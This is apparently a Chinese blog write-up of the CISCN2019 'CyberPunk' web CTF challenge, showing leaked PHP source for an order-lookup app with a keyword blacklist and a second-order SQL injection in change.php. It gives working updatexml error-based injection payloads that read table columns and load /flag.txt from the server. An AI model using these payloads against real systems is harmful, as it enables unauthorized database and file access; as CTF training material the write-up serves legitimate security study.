[CISCN2019 华北赛区 Day1 Web5]CyberPunk

进入题目
image

点击左下角
发现不同文件

image

image

image

查看index.php检查发现
image

file参数
猜测文件包含用php为协议读取源码
image

  • require_once "config.php";

  • if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))

  • {

  • $msg = '';
    
  • $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    
  • $user_name = $_POST["user_name"];
    
  • $phone = $_POST["phone"];
    
  • if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ 
    
  •     $msg = 'no sql inject!';
    
  • }else{
    
  •     $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
    
  •     $fetch = $db->query($sql);
    
  • }
    
  • if (isset($fetch) && $fetch->num_rows>0){
    
  •     $row = $fetch->fetch_assoc();
    
  •     if(!$row) {
    
  •         echo 'error';
    
  •         print_r($db->error);
    
  •         exit;
    
  •     }
    
  •     $msg = "<p>姓名:".$row['user_name']."</p><p>, 电话:".$row['phone']."</p><p>, 地址:".$row['address']."</p>";
    
  • } else {
    
  •     $msg = "未找到订单!";
    
  • }
    
  • }else {

  • $msg = "信息不全";
    
  • }

  • ?>

  • <head>
  • <title>搜索</title>
  • </head>
  • <body>
  • <div class="container">
    
  •     <div class="row">
    
  •         <div class="col-md-8 col-md-offset-2 centered">
    
  •             <p style="margin:35px 0;"><br></p>
    
  •             <h1>订单查询</h1>
    
  •             <form method="post">
    
  •                 <p>
    
  •                 <h3>姓名:</h3>
    
  •                 <input type="text" class="subscribe-input" name="user_name">
    
  •                 <h3>电话:</h3>
    
  •                 <input type="text" class="subscribe-input" name="phone">
    
  •                 </p>
    
  •                 <p>
    
  •                 <button class='btn btn-lg  btn-sub btn-white' type="submit">查询订单</button>
    
  •                 </p>
    
  •             </form>
    
  •             <?php global $msg; echo '<h2 class="mb">'.$msg.'</h2>';?>
    
  •         </div>
    
  •     </div>
    
  • </div>
    
  • <div class="container">
    
  •     <div class="row">
    
  •         <p style="margin:35px 0;"><br></p>
    
  •         <h2 class="mb">订单管理</h2>
    
  •         <a href="./index.php">
    
  •             <button class='btn btn-lg btn-register btn-sub btn-white'>返回</button>
    
  •         </a>
    
  •         <a href="./change.php">
    
  •             <button class="btn btn-lg btn-register btn-white" >我要修改收货地址</button>
    
  •         </a> 
    
  •         <a href="./delete.php">
    
  •             <button class="btn btn-lg btn-register btn-white" >我不想要了</button>
    
  •         </a>    
    
  •     </div>
    
  • </div>
    
  • </body>
  • 同理可得到其他文件的源码

delete.php

  • require_once "config.php";

  • if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))

  • {

  • $msg = '';
    
  • $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    
  • $user_name = $_POST["user_name"];
    
  • $phone = $_POST["phone"];
    
  • if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ 
    
  •     $msg = 'no sql inject!';
    
  • }else{
    
  •     $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
    
  •     $fetch = $db->query($sql);
    
  • }
    
  • if (isset($fetch) && $fetch->num_rows>0){
    
  •     $row = $fetch->fetch_assoc();
    
  •     $result = $db->query('delete from `user` where `user_id`=' . $row["user_id"]);
    
  •     if(!$result) {
    
  •         echo 'error';
    
  •         print_r($db->error);
    
  •         exit;
    
  •     }
    
  •     $msg = "订单删除成功";
    
  • } else {
    
  •     $msg = "未找到订单!";
    
  • }
    
  • }else {

  • $msg = "信息不全";
    
  • }

  • ?>

  • <head>
  • <title>删除订单</title>
  • </head>
  • <body>
  • <div class="container">
    
  •     <div class="row">
    
  •         <div class="col-md-8 col-md-offset-2 centered">
    
  •             <p style="margin:35px 0;"><br></p>
    
  •             <h1>删除订单</h1>
    
  •             <form method="post">
    
  •                 <p>
    
  •                 <h3>姓名:</h3>
    
  •                 <input type="text" class="subscribe-input" name="user_name">
    
  •                 <h3>电话:</h3>
    
  •                 <input type="text" class="subscribe-input" name="phone">
    
  •                 </p>
    
  •                 <p>
    
  •                 <button class='btn btn-lg  btn-sub btn-white' type="submit">删除订单</button>
    
  •                 </p>
    
  •             </form>
    
  •             <?php global $msg; echo '<h2 class="mb" style="color:#ffffff;">'.$msg.'</h2>';?>
    
  •         </div>
    
  •     </div>
    
  • </div>
    
  • <div class="container">
    
  •     <div class="row">
    
  •         <h2 class="mb">订单管理</h2>
    
  •         <a href="./index.php">
    
  •             <button class='btn btn-lg btn-register btn-sub btn-white'>返回</button>
    
  •         </a>
    
  •         <a href="./search.php">
    
  •             <button class="btn btn-lg btn-register btn-white" >我要查订单</button>
    
  •         </a>
    
  •         <a href="./change.php">
    
  •             <button class="btn btn-lg btn-register btn-white" >我要修改收货地址</button>
    
  •         </a>
    
  •     </div>
    
  • </div>
    
  • </body>

change.php

  • require_once "config.php";

  • if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))

  • {

  • $msg = '';
    
  • $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    
  • $user_name = $_POST["user_name"];
    
  • $address = addslashes($_POST["address"]);
    
  • $phone = $_POST["phone"];
    
  • if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
    
  •     $msg = 'no sql inject!';
    
  • }else{
    
  •     $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
    
  •     $fetch = $db->query($sql);
    
  • }
    
  • if (isset($fetch) && $fetch->num_rows>0){
    
  •     $row = $fetch->fetch_assoc();
    
  •     $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
    
  •     $result = $db->query($sql);
    
  •     if(!$result) {
    
  •         echo 'error';
    
  •         print_r($db->error);
    
  •         exit;
    
  •     }
    
  •     $msg = "订单修改成功";
    
  • } else {
    
  •     $msg = "未找到订单!";
    
  • }
    
  • }else {

  • $msg = "信息不全";
    
  • }

  • ?>

  • <head>
  • <title>修改收货地址</title>
  • </head>
  • <body>
  • <div class="container">
    
  •     <div class="row">
    
  •         <div class="col-md-8 col-md-offset-2 centered">
    
  •             <p style="margin:35px 0;"><br></p>
    
  •             <h1>修改收货地址</h1>
    
  •             <form method="post">
    
  •                 <p>
    
  •                 <h3>姓名:</h3>
    
  •                 <input type="text" class="subscribe-input" name="user_name">
    
  •                 <h3>电话:</h3>
    
  •                 <input type="text" class="subscribe-input" name="phone">
    
  •                 <h3>地址:</h3>
    
  •                 <input type="text" class="subscribe-input" name="address">
    
  •                 </p>
    
  •                 <p>
    
  •                 <button class='btn btn-lg  btn-sub btn-white' type="submit">修改订单</button>
    
  •                 </p>
    
  •             </form>
    
  •             <?php global $msg; echo '<h2 class="mb">'.$msg.'</h2>';?>
    
  •         </div>
    
  •     </div>
    
  • </div>
    
  • <div class="container">
    
  •     <div class="row">
    
  •         <p style="margin:35px 0;"><br></p>
    
  •         <h2 class="mb">订单管理</h2>
    
  •         <a href="./index.php">
    
  •             <button class='btn btn-lg btn-register btn-sub btn-white'>返回</button>
    
  •         </a>
    
  •         <a href="./search.php">
    
  •             <button class="btn btn-lg btn-register btn-white" >我要查订单</button>
    
  •         </a>
    
  •         <a href="./delete.php">
    
  •             <button class="btn btn-lg btn-register btn-white" >我不想要了</button>
    
  •         </a>
    
  •     </div>
    
  • </div>
    
  • </body>

在change.php中发现可利用二次注入,它调用了旧地址
image

于是sql注入,报错注入
1' and updatexml(1,concat(0x7e,(substr((select group_concat(column_name) from information_schema.columns where table_name='user' and table_schema='ctfusers'),25,30)),0x7e),1)#
image

通过查表等操做发现数据库中没有flag,猜测在文件/flag.txt中,函数返回最长值有限分两次读取
1' and updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,30)),0x7e),1)#
1' and updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),28,50)),0x7e),1)#

image

image

posted @ 2024-07-07 14:26  vзn0m  阅读(15)  评论(0编辑  收藏  举报